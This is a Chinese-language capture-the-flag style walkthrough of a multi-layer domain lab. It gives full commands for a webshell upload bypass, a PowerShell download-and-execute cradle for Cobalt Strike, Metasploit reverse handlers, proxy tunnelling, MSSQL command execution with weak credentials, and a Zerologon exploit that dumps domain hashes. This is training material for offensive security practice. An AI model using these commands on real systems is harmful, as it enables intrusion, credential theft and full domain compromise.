域环境靶场-WP

靶场环境大概是这样的

外网主机上线

注册一个用户，登录后台后，找到个人资料功能点，有一个上传文件的功能点，F12找到路径（https://blog.csdn.net/qq_42321190/article/details/139424041参考的这个）

访问路径，进行上传文件操作

数据包内容为大马

https://github.com/tennc/webshell/blob/master/www-7jyewu-cn/%E9%9D%9E%E5%B8%B8%E7%89%9B%E9%80%BC%E7%9A%84Jsp%E5%A4%A7%E9%A9%AC.jsp

将数据包后缀名进行反复上传

jpg
jsp
jpg
jsp
jpg
jsp
jpg
jsp
jpg
jsp

复制返回路径

寻找一下图片的路径，用BP抓包，抓不到浏览器访问的包，手动构造一下

10.10.0.123:8088/upload/20250825/tes_20250825103054099.jpg

修改后缀名为jsp，将后三位进行爆破

找到上传成功的jsp

访问

CS设置监听

生成攻击载荷

powershell.exe -nop -w hidden -c "IEX ((new-objectnet.webclient).downloadstring('http://ip:端口/a'))"

运行

上线CS，并提升权限

没有在域里

shell ping DC

发现192.168.0.126/24网段

CS联动msf

CS创建监听

msf

use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 0.0.0.0
set lport 48012

CS执行

spawn msf //msf是监听器的名字

不出网第二台主机上线

搭建代理，使用Stowaway工具

在服务器上运行

./linux_x64_admin -l 8000 -s 123

将文件上传到第一台主机192.168.0.126上

运行

windows_x64_agent.exe -c 服务器ip:8000 -s 123 --reconnect 8

然后创建隧道，我这报错是因为我已经创建了一个，让我把旧的停了

Proxifier创建规则

dddd进行扫描，扫描出mssql弱口令，sa/admin123

MDUT可以连接成功

激活组件后，可以执行命令，依旧有两个网卡，还有一层

也可以使用msf的auxiliary/admin/mssql/mssql_exec

先添加路由

run autoroute -p

run post/multi/manage/autoroute

设置/mssql_exec各个参数

msf exploit(windows/smb/psexec) > use auxiliary/admin/mssql/mssql_exec
msf auxiliary(admin/mssql/mssql_exec) > set session 6
msf auxiliary(admin/mssql/mssql_exec) > set PASSWORD admin123
msf auxiliary(admin/mssql/mssql_exec) > set username sa
msf auxiliary(admin/mssql/mssql_exec) > set cmd 'whoami'
msf auxiliary(admin/mssql/mssql_exec) > set RHOST 192.168.0.128
msf auxiliary(admin/mssql/mssql_exec) > options

运行以后报错

不知道什么原因，只能不设置session了

msf auxiliary(admin/mssql/mssql_exec) > unset SESSION

运行，又报错，报错原因是数据库名不对

想把数据库名清空，set --clear DATABASE，但还是报错

最后使用系统默认库，master

msf auxiliary(admin/mssql/mssql_exec) >  set DATABASE master

运行成功

中转上线第二台主机

新建一个监听

生成exe，在目标上执行就行了，但是第二台不出网没办法直接下载

把exe上传到第一台主机上

使用MDUT访问第一台，下载到第二台

这里尝试了curl、wget等，不是因为主机本身没有工具就是因为权限不够，权限不够最后选择了这个路径C:\Users\MSSQLSERVER

powershell -c "iwr -Uri http://192.168.0.126:8088/upload/20250826/be_x64.exe -OutFile C:\Users\MSSQLSERVER\be_x64.exe"

运行

C:\Users\MSSQLSERVER\be_x64.exe

上线

提权

烂土豆运行whoami的结果是system

那直接运行中转的exe文件，直接system权限上线CS

不出网第三台主机上线

存在域环境，并抓取了hash等（通过CS的psexec横向失败，希望有懂得大佬提点我一下感谢感谢）

域内横向没成功，那搭建代理吧

再搭建一层代理，为了访问到10.10.10.139

上传代理工具到10.10.10.136，还是通过刚刚的方式，要上传到/upload/20250826/路径下，这个截图有问题

powershell -c "iwr -Uri http://192.168.0.126:8088/upload/20250826/windows_x64_agent.exe -OutFile C:\Users\MSSQLSERVER\windows_x64_agent.exe"

在use 0上起一个监听，依次输入1和监听端口27850

在10.10.10.136上执行命令

C:\Users\MSSQLSERVER\windows_x64_agent.exe -c 192.168.0.126:27850 -s 123 --reconnect 8 

二层代理搭建完成

在新加的代理上起一个socks隧道

Proxifier上再添加一个规则

然后我用dddd扫了一下，但是没有东西可以用

在我的物理机上直接使用工具，工具地址 https://github.com/StarfireLab/AutoZerologon

上线第三台主机

python AutoZerologon.py 10.10.10.139 -scan

python AutoZerologon.py 10.10.10.139 -exp -user domain_admins

Administrator:500:aad3b435b51404eeaad3b435b51404ee:81220c729f6ccb63d782a77007550f74:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:b20eb34f01eaa5ac8b6f80986c765d6d:::
sec123.cnk\cnk:1108:aad3b435b51404eeaad3b435b51404ee:83717c6c405937406f8e0a02a7215b16:::
AD01$:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SERVER2012$:1109:aad3b435b51404eeaad3b435b51404ee:fd62e356f4c597184b47bf7781fece12:::

python AutoZerologon.py 10.10.10.139 -shell